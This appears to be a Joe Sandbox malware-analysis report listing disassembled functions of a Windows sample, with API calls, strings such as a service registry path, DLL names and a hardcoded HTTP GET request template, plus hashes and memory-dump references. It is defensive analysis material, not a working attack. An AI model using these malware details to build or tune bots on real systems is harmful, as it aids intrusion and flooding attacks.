Instruction ID: da15035d668b36466e8179076398aeffbcb361aec3f94f14ce4845e29cafbb59
Opcode Fuzzy Hash: c6c2baf483a5c7817c0615bf604dfdbf5b4d22fa498cde7f9790926ec1ef48c2
Instruction Fuzzy Hash: 214171715443019BE720CF34DD44B2BBBE4AB84764F140A2EF9A1B63F0E778D9458B9A

Function 00403E89 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 91sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 00403F9E
ExitThread.KERNEL32 ref: 00403FAB

Strings

L8@, xrefs: 00403EDE
:8@, xrefs: 00403F00
8@, xrefs: 00403EB7
(8@, xrefs: 00403F10

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: ExitSleepThread
String ID: (8@$:8@$L8@$8@
API String ID: 2532117645-3614555925
Opcode ID: 03f13d39a4d50158b3b0a3e900b25450fd1bb83df8e0ac367b200edcad169de3
Instruction ID: 45af933c2d0913eb26ad9620014091e4a7ed23ef7f5d571b2848da93812ef47f
Opcode Fuzzy Hash: 03f13d39a4d50158b3b0a3e900b25450fd1bb83df8e0ac367b200edcad169de3
Instruction Fuzzy Hash: EE310231604300ABD310AF24ED45BAFB7A8EF95311F00443DF689A72C1CA7499098B9A

Function 004027E2 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 49sleepsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00402500: EnumResourceNamesA.KERNEL32(00000000,0000000A,Function_00002430,00000000), ref: 0040250B

Part of subcall function 00402520: lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402533
Part of subcall function 00402520: lstrcatA.KERNEL32(?,100200), ref: 00402543

Part of subcall function 00401980: LoadLibraryA.KERNEL32 ref: 004019A0

Part of subcall function 004012B0: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004012C2

WaitForSingleObject.KERNEL32(00000000,000000FF,Function_000019C0,00000000), ref: 00402864
CloseHandle.KERNEL32(?), ref: 0040286D
Sleep.KERNEL32(0000012C), ref: 00402887

Strings

8@, xrefs: 00402838
hra%u.dll, xrefs: 004027F1
<6@, xrefs: 004027F7

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseCreateEnumHandleLibraryLoadNamesObjectResourceSingleSleepThreadWaitlstrcatlstrcpy
String ID: <6@$hra%u.dll$8@
API String ID: 3019664125-4073101535
Opcode ID: b727a94cfc5c1870f1e87c0db4c5fd5ae21f5c357b8a6d8ebe3cffbda59e6732
Instruction ID: b4c6470f87cb35eaba9384fad452608e987ecd5d27c4b6046072c90e75b6b2b8
Opcode Fuzzy Hash: b727a94cfc5c1870f1e87c0db4c5fd5ae21f5c357b8a6d8ebe3cffbda59e6732
Instruction Fuzzy Hash: B701D275240300ABD200BB70EE8AFAAB364AB48710F10063EFA51721E2DEF994018B6D

Function 004043C1 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000032,?,00000000), ref: 004044EC
ExitThread.KERNEL32 ref: 004044F6

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Strings

GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00404443
<6@, xrefs: 00404449, 0040448B
GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo, xrefs: 00404485

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: <6@$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo
API String ID: 896407411-1180673266
Opcode ID: 9c0648faaa7c580b1096e69dcd622242baed2352659d7df1ab5bc987a3810d2b
Instruction ID: fa830c5a6accc8db5a56bc8424976762d41b4de0ccec1c973aff273b9f1804e2
Opcode Fuzzy Hash: 9c0648faaa7c580b1096e69dcd622242baed2352659d7df1ab5bc987a3810d2b
Instruction Fuzzy Hash: 0831DBF15043406BE210EB24DC46FFBB3ACEB94305F04093DF645E21C2EA756A0886AB

Function 00403D6B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 87sleepthreadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 00403E83

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000005), ref: 00403E6D

Strings

L8@, xrefs: 00403DC7
:8@, xrefs: 00403DDE
p8@, xrefs: 00403E00

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CountExitSleepThreadTickrand
String ID: :8@$L8@$p8@
API String ID: 896407411-1348165829
Opcode ID: 3e75125e98315a6c303164bdcc62422dc0ac1f7090f3bf2c4196777fe1904896
Instruction ID: c0699dc0de98f8c7b82e62ff3ffffc6daf283feedac10fb4a2c39f1d9fb6e09f
Opcode Fuzzy Hash: 3e75125e98315a6c303164bdcc62422dc0ac1f7090f3bf2c4196777fe1904896
Instruction Fuzzy Hash: 1821F3316043006BE3109B15DD45BABB7EAAFC8705F00093DF689B72C1DAB45A088BDB

Function 00401E9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84librarystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00401C02
CloseHandle.KERNEL32(?), ref: 00401C3F
LoadLibraryA.KERNEL32(PlusCtrl.dll), ref: 00401C52
lstrlenA.KERNEL32(?), ref: 00401EB1

Strings

PlusCtrl.dll, xrefs: 00401C45

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseHandle$LibraryLoadlstrlen
String ID: PlusCtrl.dll
API String ID: 1302537757-3813448905
Opcode ID: 9d6033b6bf4a2c9d292d010c3143f14cd85b7083ffd7105bc62b5e031c1c6f82
Instruction ID: fe13cccd782696a5966384611aa504fe5a24fcd4d90c73c14022dd0c19df5bb8
Opcode Fuzzy Hash: 9d6033b6bf4a2c9d292d010c3143f14cd85b7083ffd7105bc62b5e031c1c6f82
Instruction Fuzzy Hash: 303160715443019BE720CF24DD44E6BB7E8ABC4754F144A2EF9A1A32E0E738E845CB56

Function 00403C60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000014), ref: 00403D53
ExitThread.KERNEL32 ref: 00403D65

Strings

L8@, xrefs: 00403CEB
:8@, xrefs: 00403CFC
p8@, xrefs: 00403D1E

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
